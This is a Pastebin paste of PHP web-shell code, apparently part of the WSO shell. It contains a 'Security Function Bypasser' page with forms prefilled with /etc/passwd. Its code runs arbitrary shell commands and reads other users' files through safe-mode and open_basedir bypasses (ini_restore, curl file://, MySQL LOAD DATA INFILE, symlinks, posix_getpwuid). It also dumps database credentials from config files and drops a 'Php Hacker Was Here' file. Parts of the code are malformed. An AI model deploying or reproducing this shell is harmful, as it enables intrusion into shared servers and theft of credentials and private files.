Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php ?><?php
- echo "<link rel='shortcut icon' href='http://www.dz-streaming.eu/favicon.ico'>
- <style type='text/css'>
- input[type=submit], input[type=button], input[type=reset]{
- text-align:center;
- background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
- border:1px solid #4D4D4D;
- color:#CCCCCC;
- border-top-color:#565656;
- padding:4px 6px;
- margin:4px 5px;
- height:16px;
- -moz-box-shadow:0 0 1px black;
- -webkit-box-shadow:0 0 1px black;
- box-shadow:0 0 1px black;
- text-shadow:0 1px black;
- -moz-border-radius:4px;
- -webkit-border-radius:4px;
- -khtml-border-radius:4px;
- border-radius:4px;
- height:23px;
- }
- input[type=submit]:hover , input[type=button]:hover, input[type=reset]:hover{
- background-position:center top;
- text-decoration:none;
- }
- input[type=text], input[type=password]{
- background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
- border:1px solid #4D4D4D;
- color:#CCCCCC;
- border-top-color:#565656;
- -moz-box-shadow:0 0 1px black;
- -webkit-box-shadow:0 0 1px black;
- box-shadow:0 0 1px black;
- -moz-border-radius:4px;
- -webkit-border-radius:4px;
- -khtml-border-radius:4px;
- border-radius:4px;
- height:18px;
- margin-left: 5px;
- }
- input , textarea , button , body , caption , table ,area , option {
- outline:none;
- transition: all 0.20s ease-in-out;
- -webkit-transition: all 0.25s ease-in-out;
- -moz-transition: all 0.25s ease-in-out;
- border-radius:3px;
- -webkit-border-radius:3px;
- -moz-border-radius:3px;
- border:1px solid rgba(0,0,0, 0.2);
- /* font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; */
- }
- input , textarea {
- background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #333333;';
- }
- input:focus, textarea:focus ,button:active , body:focus , caption:focus , table:focus ,area:focus ,option:focus {
- box-shadow: 0 0 5px rgba(0, 0, 255, 1);
- -webkit-box-shadow: 0 0 5px rgba(0, 0, 255, 1);
- -moz-box-shadow: 0 0 5px rgba(0, 0, 255, 1);
- border: 1px solid #CCCC00;
- background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #333333;';
- overflow: auto;
- /* font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; */
- }
- body{
- /* font-family : Verdana; */
- color : #f9f6f1;
- font-size : 0.7em;
- background: url(http://i44.tinypic.com/i56tc9.jpg) no-repeat center top #252525;
- }
- input , textarea {
- outline:none;
- transition: all 0.20s ease-in-out;
- -webkit-transition: all 0.25s ease-in-out;
- -moz-transition: all 0.25s ease-in-out;
- border-radius:3px;
- -webkit-border-radius:3px;
- -moz-border-radius:3px;
- border:1px solid rgba(0,0,0, 0.2);
- }
- input:focus, textarea:focus {
- outline: 0;
- border-color: rgba(82, 168, 236, 0.8);
- -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
- -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
- box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
- background: url('http://i41.tinypic.com/ibkmd5.png') repeat scroll 0 0 #333333;';
- overflow: auto;
- }
- </style>
- function actionbypss() {
- wsoHeader();
- echo '
- <center>
- <a href=# onclick="g(\'etcnmd\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Server User Function Bypasser ]</a><br><br>
- <a href=# onclick="g(\'etcbaypass\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Etc/passwd/ Function Bypasser ]</a><br><br>
- <a href=# onclick="g(\'SafeMode\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ Safe Mode Bypass ]</a><br>
- ';
- wsoFooter();
- }
- ####################### bypassing #########################
- function actionbypassing() {
- wsoHeader();
- echo '<center><h1>Security Function Bypasser </h1>';
- error_reporting(0);
- set_magic_quotes_runtime(0);
- if (version_compare(phpversion(), '4.1.0') == - 1) {
- $_POST = & $HTTP_POST_VARS;
- $_GET = & $HTTP_GET_VARS;
- $_SERVER = & $HTTP_SERVER_VARS;
- }
- function inclink($link, $val) {
- $requ = $_SERVER["REQUEST_URI"];
- if (strstr($requ, $link)) {
- return preg_replace("/$link=[\d\w\W\D\S]*/", "$link=$val", $requ);
- } elseif (strstr($requ, "showsc")) {
- return preg_replace("/showsc=[\d\w\W\D\S]*/", "$link=$val", $requ);
- } elseif (strstr($requ, "hlp")) {
- return preg_replace("/hlp=[\d\w\W\D\S]*/", "$link=$val", $requ);
- } elseif (strstr($requ, "?")) {
- return $requ . "&" . $link . "=" . $val;
- } else {
- return $requ . "?" . $link . "=" . $val;
- }
- }
- function delm($delmtxt) {
- print "<center><table bgcolor=black style='border:1px solid #008080' width=99% height=2%>";
- print "<tr><td><b><center><font size=2 color=#008080>$delmtxt</td></tr></table></center>";
- }
- function callfuncs($cmnd) {
- if (function_exists(shell_exec)) {
- $scmd = shell_exec($cmnd);
- $nscmd = htmlspecialchars($scmd);
- print $nscmd;
- } elseif (!function_exists(shell_exec)) {
- exec($cmnd, $ecmd);
- $ecmd = join("
- ", $ecmd);
- $necmd = htmlspecialchars($ecmd);
- print $necmd;
- } elseif (!function_exists(exec)) {
- $pcmd = popen($cmnd, "r");
- while (!feof($pcmd)) {
- $res = htmlspecialchars(fgetc($pcmd));;
- print $res;
- }
- pclose($pcmd);
- } elseif (!function_exists(popen)) {
- ob_start();
- system($cmnd);
- $sret = ob_get_contents();
- ob_clean();
- print htmlspecialchars($sret);
- } elseif (!function_exists(system)) {
- ob_start();
- passthru($cmnd);
- $pret = ob_get_contents();
- ob_clean();
- print htmlspecialchars($pret);
- }
- }
- function input($type, $name, $value, $size) {
- if (empty($value)) {
- print "<input type=$type name=$name size=$size>";
- } elseif (empty($name) && empty($size)) {
- print "<input type=$type value=$value >";
- } elseif (empty($size)) {
- print "<input type=$type name=$name value=$value >";
- } else {
- print "<input type=$type name=$name value=$value size=$size >";
- }
- }
- function permcol($path) {
- if (is_writable($path)) {
- print "<font color=#008080>";
- callperms($path);
- print "</font>";
- } elseif (!is_readable($path) && !is_writable($path)) {
- print "<font color=red>";
- callperms($path);
- print "</font>";
- } else {
- print "<font color=white>";
- callperms($path);
- }
- }
- if ($dlink == "dwld") {
- download($_REQUEST['dwld']);
- }
- function download($dwfile) {
- $size = filesize($dwfile);
- @header("Content-Type: application/force-download;name=$dwfile");
- @header("Content-Transfer-Encoding: binary");
- @header("Content-Length: $size");
- @header("Content-Disposition: attachment; filename=$dwfile");
- @header("Expires: 0");
- @header("Cache-Control: no-cache, must-revalidate");
- @header("Pragma: no-cache");
- @readfile($dwfile);
- exit;
- }
- ?>
- <?
- $nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
- $sf="<form method=post>";$ef="</form>";
- $st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
- $et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
- $c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
- $sta="<textarea cols=157 rows=23>";$eta="</textarea>";
- $sfnt="<font face=tahoma size=2 color=#008080>";$efnt="</font>";
- ///////////////////////////////
- //
- $mysql_use = "no"; //"yes" //
- $mhost = "localhost"; //
- $muser = "root"; //
- $mpass = "pass"; //
- $mdb = "name"; //
- $them = "xxx"; //any site //
- $you = "xx"; //your username //
- $flib = "hack15.txt"; //
- $folder = "hack15.txt"; //
- ///////////////////////////////
- ################# PhP Hacked ########################
- // read greet //
- if ($linux=='greet')
- {
- echo "</textarea>";
- }
- // read file unzend sorce //
- if(empty($_POST['sorce'])){
- } else {
- }
- // read file unzend functions //
- if(empty($_POST['func'])){
- } else {
- echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
- $zeen=$_POST['func'];
- require("$zeen");
- echo "Database : ".$config['Database']['dbname']." <X> ";
- echo "UserName : ".$config['MasterServer']['username']." <X> ";
- echo "Password : ".$config['MasterServer']['password']." <X> ";
- echo "</textarea></p>";
- }// read file symlink ( ) //
- if(empty($_POST['sym'])){
- } else {
- echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
- $fp = fopen("hack15.txt","w+");
- fwrite($fp,"Php Hacker Was Here");
- @unlink($flib);
- $sym = "/home/" . $them . "/public_html/" . $k;
- $link = "/home/" . $you . "/public_html/" . $folder . "/" . $flib;
- @symlink($sym, $link);
- if ($k{0} == "/") {
- echo "<script> window.location = '" . $flib . "'</script>";
- }else{
- echo "<pre><xmp>";
- echo readlink($flib) . "
- ";
- echo "Filesize: " . linkinfo($flib) . "B
- ";
- echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $folder . "/" . $flib);
- echo "</textarea>";
- }
- }
- // read file plugin ( ) //
- if(empty($_POST['plugin'])){
- } else {
- echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
- for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
- $ara = posix_getpwuid($uid);
- if (!empty($ara)) {
- while (list ($key, $val) = each($ara)){
- print "$val:";
- }
- print "
- ";
- }
- }
- echo "</textarea>";
- }
- // read file id ( ) //
- if ($_POST['rid'] ){
- echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
- for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
- $ara = posix_getpwuid($uid);
- if (!empty($ara)) {
- while (list ($key, $val) = each($ara)){
- print "$val:";
- }
- print "
- ";
- }
- }
- echo "</textarea>";
- break;
- }
- // read file imap ( ) //
- $string = !empty($_POST['rimap']) ? $_POST['rimap'] : 0;
- if(empty($_POST['rimap'])){
- } else {
- echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
- $stream = imap_open($string, "", "");
- $str = imap_body($stream, 1);
- echo "</textarea>";
- }
- // read file Curl ( ) //
- if(empty($_POST['curl'])){
- } else {
- echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
- $m=$_POST['curl'];
- $ch =
- curl_init("file:///".$m."/../../../../../../../../../../../../".__FILE__);
- curl_exec($ch);
- var_dump(curl_exec($ch));
- echo "</textarea>";
- }
- // read file SQL ( ) //
- if(empty($_POST['ssql'])){
- } else {
- echo "<textarea method='POST' cols='95' rows='30' wrar='off' >";
- $file=$_POST['ssql'];
- $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
- $mysql_files = explode(':', $mysql_files_str);
- $sql = array (
- "USE $mdb",
- 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
- "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
- . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
- . "ESCAPED BY '' "
- . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
- "SELECT a FROM $tbl LIMIT 1"
- );
- mysql_connect ($mhost, $muser, $mpass);
- foreach ($sql as $statement) {
- $q = mysql_query ($statement);
- if ($q == false) die (
- "FAILED: " . $statement . "
- " .
- "REASON: " . mysql_error () . "
- "
- );
- if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
- echo htmlspecialchars($r[0]);
- mysql_free_result ($q);
- }
- echo "</textarea>";
- }
- // read file copy & ini ( ) //
- if (isset ($_REQUEST['safefile'])){
- $file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
- if(empty($_GET['file'])){if(empty($_POST['file'])){
- print "<center>[ Please choose a file first to read it using copy() ]</center>";
- } else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
- $temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
- $zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
- fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
- print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
- </CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
- ini_restore("safe_mode");ini_restore("open_basedir");
- print "<center><pre>".$sta;
- if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}
- }
- </center><table bgcolor=#2A2A2A style="border:2px solid black" width=100%><tr><td width=50%><div align=left><table style="border:1px #dadada solid " width=100% height=100%>
- <tr><td height=22% style="border:1px #dadada solid "><div><b>
- <center>
- Using copy() function</div></tr></td><tr>
- <td style="border:1px #dadada solid "><form method=post>
- <input type=text name=safefile value=/etc/passwd size=75 >
- <input type=hidden name=scdir value=/etc/passwd >
- <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
- </center></tr></td></form></table></td><td height=20% width=50%><div align=right><table style="border:1px #dadada solid " width=100% height=100%><tr>
- <td height=22% style="border:1px #dadada solid "><div><b><center>
- Using ini_restore() function</div></tr></td><tr>
- <td style="border:1px #dadada solid "><form method=post>
- <input type=text name=inifile value=/etc/passwd size=75 >
- <input type=hidden name=scdir value=/etc/passwd >
- <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
- </center></tr></td></form></table></td></tr></table><table bgcolor=#2A2A2A style="border:2px solid black" width=100%><tr>
- <td width=50%><div align=left><table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
- Using sql() function</div></tr></td><tr>
- <td style="border:1px #dadada solid "><form method=post>
- <input type=text name=ssql value=/etc/passwd size=75 >
- <input type=hidden name=scdir value=/etc/passwd >
- <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
- </center></tr></td></form></table></td><td height=20% width=50%><div align=right><table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
- Using Curl() function</div></tr></td><tr>
- <td style="border:1px #dadada solid "><form method=post>
- <input type=text name=curl value=/etc/passwd size=75 >
- <input type=hidden name=scdir value=/etc/passwd >
- <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
- </center></tr></td></form></table></td></tr></table>
- <table bgcolor=#2A2A2A style="border:2px solid black" width=100%><tr><td width=50%><div align=left>
- <table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
- Using imap() function</div></tr></td><tr>
- <td style="border:1px #dadada solid "><form method=post>
- <input type=text name=rimap value=/etc/passwd size=75 >
- <input type=hidden name=scdir value=/etc/passwd >
- <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
- </center></tr></td></form></table></td>
- <td height=20% width=50%><div align=right>
- <table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
- Using id() function</div></tr></td><tr>
- <td style="border:1px #dadada solid "><form method=post>
- <input type=text name=rid value=/etc/passwd size=75 >
- <input type=hidden name=scdir value=/etc/passwd >
- <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
- </center></tr></td></form></table></td></tr></table><table bgcolor=#2A2A2A style="border:2px solid black" width=100%>
- <tr><td width=50%><div align=left><table style="border:1px #dadada solid " width=100% height=100%><tr><td height=22% style="border:1px #dadada solid "><div><b><center>
- Using plugin() function</div></tr></td><tr>
- <td style="border:1px #dadada solid "><form method=post>
- <input type=text name=plugin value=/etc/passwd size=75 >
- <input type=hidden name=scdir value=/etc/passwd >
- <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
- </center></tr></td></form></table></td><td height=20% width=50%><div align=right><table style="border:1px #dadada solid " width=100% height=100%><tr>
- <td height=22% style="border:1px #dadada solid "><div><b><center>
- Using symlink() function</div></tr></td><tr>
- <td style="border:1px #dadada solid "><form method=post>
- <input type=text name=sym value=/etc/passwd size=75 >
- <input type=hidden name=scdir value=/etc/passwd >
- <input type="hidden" name="a" value="bypassing"><input type=submit value=Bypass >
- </center></tr></td></form></table></td></tr></table>
- <?php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement